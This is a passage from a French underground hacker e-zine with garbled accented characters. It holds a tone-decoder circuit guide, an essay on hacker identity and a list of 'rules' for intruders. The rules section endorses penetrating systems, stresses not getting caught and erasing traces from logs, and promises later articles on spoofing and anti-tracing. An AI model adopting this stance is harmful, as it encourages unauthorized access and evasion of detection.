------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ IX] Un d‚codeur de tonalit‚ Un d‚codeur de tonalit‚ est un systŠme capable de reconnaŒtre une fr‚quence et de donner un ordre lors de la r‚ception de cette fr‚quence. Le modŠle que je vais vous proposer est un modŠle triple,capable de reconnaŒtre trois fr‚quences diff‚rentes. Personnellement, je m'en sert avec un t‚l‚phone mais rien ne vous empŠche de l'utiliser avec un magn‚tophone ou autre chose... Disons que si vous ˆtes vraiment parano et que vous voulez d‚clencher … distance la destruction de votre ordinateur (bien que vous puissiez vous en servir pour tout autre chose), ce montage pourra vous ˆtre utile. Le sch‚ma ‚tant identique pour les trois fr‚quences, il vous suffit de le reproduire 3 fois. Le circuit utilis‚ est un LM, XR, NE567. Bien que vous puissiez le remplacer avec quelque chose de beaucoup plus r‚cent, ce montage est parfaitement fonctionnel et efficace pour un coup d‚risoire. Si vous souhaitez vous pouvez utiliser une version … faible consommation comme le XRL567 mais vous aurez alors l'inconv‚nient d'un courant de sortie plus faible... A vous de voir. Le circuit int‚gr‚ ‚tant sp‚cifique, il s'utilise en g‚n‚ral en suivant les recommandations du fabricant. L'astuce suivante ne se trouve pas dans les notes d'applications ; elle consiste … relier 2 condensateurs … la broche 2, ce qui rend le verrouillage du d‚tecteur ind‚pendant des fluctuations de tension provoqu‚es par la consommation du relais lorsque le montage fonctionne sur piles. La fr‚quence est d‚termin‚e par le r‚seau P1, R1 C5 : F0 = 1/R x C5, R ‚tant la somme P1+R1. Le signal d'entr‚e est ajust‚ par P1. Le montage est plus s‚lectif avec une basse tension d'entr‚e (environ 30 mV). La tension d'alimentation des relais peut ˆtre s‚par‚e de celle du d‚codeur, on peut utiliser des relais 12V et installer, entre cette alimentation et la ligne allant aux bornes 4 de CI 1, un r‚gulateur 5V. Lorsque le d‚codeur re‡oit un signal … la fr‚quence d'accord de l'oscillateur du CI(sur la borne 5 on a un signal carr‚ … la fr‚quence d'accord), la sortie passe … 0. Vous pouvez en fait r‚unir le nombre de filtres que vous souhaitez et vous rŠglerez chacun d'eux … une fr‚quence diff‚rente. Vous choisirez les fr‚quences … l'int‚rieur d'une octave, car le circuit est sensible aux harmoniques. Les condensateur sont au tantale, ce qui permet d'avoir des dimensions r‚duites. Personnellement je personnalise chaque montage en fonction du relais que je vais utiliser, ce qui permet avec la conception du circuit … double faces (merci eagle), de disposer d'un montage … la taille extrˆmement r‚duite. Par contre si vous le souhaitez, vous pouvez pr‚parer un circuit qui acceptera tous les types de relais. On peut pr‚voir le remplacement du relais R11, par un relais bistable … deux bobines (Siemens P1 ou D1), le relais R1 ‚tant alors omis. Un cavalier alimentera alors la seconde bobine. Le r‚glage se fait … l'aide d'un g‚n‚rateur AF, on injecte une tension, on rŠgle la fr‚quence par l'un des potentiomŠtres ajustables. Bon je vous laisse … votre montage ;) Nomenclature des composants : R‚sistances 1/4 W 5% : R1, R11, R21 : 82 Ohms Condensateurs : C1, C11, C21 : 22 nF MKT 5 mm C2, C12, C22 : 0,33 uF tantale goutte 10 V C3, C13, C23 : 0,68 uF tantale goutte 10 V C4, C14, C24 : 2,2 uF tantale goutte 10 V C5, C15, C25 : 10 nF MKT 5 mm Semi-conducteurs : CI1 : Circuit int‚gr‚ LM, NE, XR 567 D1, D11, D21 : diode silicium 1N4148 Divers : P1, P2, P11, P21 : potentiomŠtre ajustable vertical 47 KOhms Re1, Re11, Re21 : relais type P1, D1 Siemens, Taiko NXE, Oucsh original etc... Type monostable ou bistable … deux bobines (Re11). Tension suivant l'utilisation : 5 ou 12 V Le sch‚ma ‚lectrique : ---------------+-------+----------------------------------------------* | | | | | | -----+--------------------------* | | | Tension suivant | | +-----+ Relais | | | | |-----| +---------* C3 __|__ | D1 _|_ +--| Re | | 13 _____0,68 | 11 /_\ | 1 | *__.______* 23 | uF | 8 21 | | 11 | * | |-------|---------+--------| 21 | | | 2| CL1 |5 |-----| +---------* C1,11,21 +---| 11 21 |--------------+ | | 22 nF | 3| LM567 |6 | +-| |------------|-------|----+ |-|/ P1, 11 ,21 | | | | 1| |7 | |/| 57 KOhms -+ | C2,12| | | | /|-| |P2 | 22 __|__ | | | | | | | _____ | | | |-| R1, 11, 21 | |<-+ 0,33uF| | | | | | 82 KOhms | | | | | | |-| | | | | | | | | | | +---------+ | |C4 |24 | | | |14__|__ | __|__ | | _____ | _____ C5, 15 ,25 | 2,2 uF| | | 10 nF -+----------------+----+----+----------------+--------------------------* Bonne chance !! #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ X] Qu'est-ce qu'un hacker ? Pour les uns, un hacker est un g‚nie de l'informatique, un cr‚ateur ; Pour les autres c'est un assoif‚ de connaissances voulant en apprendre le plus possible sur les systŠmes, pour d'autres encore, c'est quelqu'un qui veut mesurer ses capacit‚s … d‚jouer des systŠmes de protection, ou encore pour Zipiz, un trou du cul. Je ne vous apporterai pas LA r‚ponse (bien que je pense que zipiz est un peu … cot‚ de la plaque). Le mot "hacker" a ‚t‚ cr‚‚ il y a de nombreuses ann‚es, par tous ceux qui sont les concepteurs de ce qui est aujourd'hui devenu Internet, c'est … dire les pionniers de l'informatique qui ont colabor‚s … la construction d'Arpanet, qui ont cr‚‚ le systŠme UNIX et qui l'on fait devenir ce qu'il est aujourd'hui... En fait l'essence mˆme du Web, les gens qui le font tourner sont des hackers. Et si ces mˆmes personnes (non non pas Zipiz), vous reconnaissent comme tel, alors vous ˆtes un hacker. On ne s'autoproclamme pas hacker. C'est cette mˆme communaut‚, par le respect qu'elle vous porte ou non qui d‚terminera si vous ˆtes ou non un hacker. Un hacker d'ailleurs, n'est pas forc‚mment un crack de la programmation. En fait c'est l'‚tat d'esprit, la capacit‚ … apprendre et le d‚terminisme qui font d'un simple mortel un hacker. Ainsi il peut y avoir des hackers dans l'‚lectronique... ou autre chose. C'est vrai que le hacker est parfois consid‚r‚ comme une sorte d'autiste, car il ne fait guŠre cas de ce qui est le plus important pour le reste du monde. Ce qui l'importe c'est surtout de progresser dans son art. Le hacker d‚veloppe toutes ces facult‚s … une vitesse extraordinaire. S'il ne connait pas quelque chose il va d‚velopper sa facult‚ d'aprentissage jusqu'… son paroxysme, afin de connaŒtre par coeur le sujet qu'il l'interesse. Un hacker n'abandonne jamais ! S'il a d‚cid‚ de r‚alis‚ quelque chose, il le fera jusqu'au bout. Et si c'est impossible (mot ray‚ du vocabulaire de base du hacker), il trouvera un moyen ‚quivalent ou se rapprochera le plus qu'il est possible de son but. Quelqu'un qui n'a pas cette mentalit‚ ne sera jamais un hacker, mˆme s'il connait par coeur toutes les bibles de programmation du monde... Un hacker … aussi l'‚tat d'esprit qui ‚tait celui des d‚buts d'Internet : Le partage de l'information. Un hacker partage ses d‚couvertes avec les autres afins que ceux-ci puissent avancer plus vite et prends lui mˆme les information que les autres ont trouv‚, qui pourrait l'aider dans ses recherches. Bien qui lui arrive de garder quelques petits trucs secret, il en divuguera toujours l'essence pour que ceux qui sont … mˆme de comprendre puisse facilement d‚couvrir des techniques ‚quivalentes. Les hackers d‚fient ‚galement toute forme d'autorit‚ : en effet une autorit‚ quelconque, peut se r‚v‚ler un barage … sa cr‚ativit‚ et sa soif de connaissance ce qui est tout … fait inacceptable pour un hacker. C'est pour cela qu'on a souvent tendance … traiter les hackers d'anarchistes. Les hackers n'aiment donc pas les boeufs... Ceux qui bˆtement suivent la masse ni ceux d'ailleurs qui essaient de la contr“ler. Il a une aversion pour tout ce qui est secret car le secret est le plus grand des barages … la connaissance. Et quoi qu'il lui arrive il restera sur cette position mˆme si sa vie se trouve menac‚e. Vous ne trouverez nulle part de bible qui vous expliquera comment devenir un hacker. Si vous en ˆtes un ou en avez la trempe, vous le saurez en sentant cette exitation lorsque vous inventez, lorsque les lignez de codes incompr‚hensible pour votre prof d'algo d‚fileront devant vous... Installer un Unix libre tel Linux est un trŠs bon d‚but. Les codes sources ‚tants fournis, il vous sera facile d'‚tudier le fonctionnement des divers programmes afin d'am‚liorer votre technique. Vous ne pourrez pas ˆtre un hacker sans comprendre le fonctionnement d'unix car internet repose sur ces systŠmes d'exploitation. Enfin participer … l'evolution du mileu dit "underground" en apportant vos correctifs et am‚lioration … des sources existant, vos propres cr‚ations, textes, opinions... Tout cela est aussi une partie de la vie du hacker. Sachez aussi que vous devrez sacrifier beaucoup de choses (vis … vis des autres) pour en arriver … ce niveau... Si vous sentez un hacker qui sommeille en vous, si vous n'abandonnez jamais vos projets, vos id‚al alors lancez vous dans l'aventure... Vous ne le regretterez pas... #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ XI] Les rŠgles … respecter. Quand on est un hacker (ou que l'on souhaite le devenir) il y a quelques rŠgles de base … respecter... Ces quelques rŠgles ont ‚t‚ rappelez mille fois et j'espŠre que d'autres penseront … le faire assez r‚guliŠrement. Certains croient en effet que p‚n‚trer un systŠme ultra-s‚curis‚ fait de vous un des meilleurs hackers.. Or c'est totalement faux. P‚n‚trer de gros systŠmes n'est pas aussi compliqu‚ qu'on veut vous le faire croire. Ainsi de grandes institutions dont je ne citerai pas le nom, sont de v‚ritables gruyŠres ! Non le plus dur n'est pas de rentrer... c'est de ne pas se faire prendre !!!. Si on veut de la renomm‚e c'est facile vous vous attaquez ouvertement … un gros systŠmes et un quart d'heure aprŠs vous vous faites interpeler. Vous prenez un pseudo qui en jette genre Brain Override, Dark Angel, Digital Squad ou encore illegal et vous passerez … la t‚l‚ pour un super g‚nie, alors que vous n'ˆtes qu'une grosse BURNE !! Et oui tout l'art d'un vrai hacker consiste … ne pas se faire d‚tecter. Nous aborderons d'ailleurs ce problŠme dans le C.H.G. 3 ou 4 o— toutes les techniques d'occultation, spoofinganti-tra‡age, effacement de ses traces dans les logs, etc... seront pass‚s au crible. Bon passons au reste. Vous ne devez en aucun cas, (sauf pour effacer vos traces) d‚truire des donn‚es quel quelles soient sur le systŠme que vous p‚n‚trez. Traitez cette machine comme la votre et laissez tout tel quel pour que les gars n'est pas … se retaper toutes ses sauvegardes !! Avertissez ensuite l'administrateur de le faille pr‚sente sur son systŠme et mettez le sur la voie pour qu'il puisse trouver ou fabriquer le correctif appropri‚. Certains ne seront peut ˆtre pas trŠs polis, pour ce qui est du reste, vous pouvez vous faire des amis qui pourront un jour vous ˆtre utile. Enfin lorsque vous trouvez une brŠche, dans un programme ou un OS qui n'est pas connue, avertissez la communaut‚! Il y a des listes de diffusion comme BUGTRAQ qui permettront de mettre le maximum de gens au courant afin qu'un correctif soit le plus vite disponible. #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ C'est ainsi que ce second num‚ro se termine. Pour le prochain mag, On va vous pr‚parer quelques exclusivit‚s... assez sp‚ciales.. Bon je tiens … remercier mon ami Digital Squad qui va vous pr‚parer quelques articles pour le prochain num‚ro, Ma copine, pour sa patience et son aide quand je comprends plus mon propre code. Ah.. oui et mort aux cons !! ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ "Consommer de la cafeine de facon abusive peut vous faire devenir l33T" #PsYkAoS# It's nice to be important, il's more important to be nice. Hack The best, _ the rest ! #Maddchat# l'exp‚rience est comme une lanterne accroch‚ dans le dos de quelqu'un elle n'‚claire que le pass‚ ;) #GENOCYD# "Un jour la France sera d‚mocratique. On peut toujours rˆver..." #peace&love# "La chance accorde ses faveurs aux esprits avertis" #Brain.Override# "T'inquiete ‡a va marcher, fais moi confiance" #Digital Squad" "Mort aux cons" #Hagen#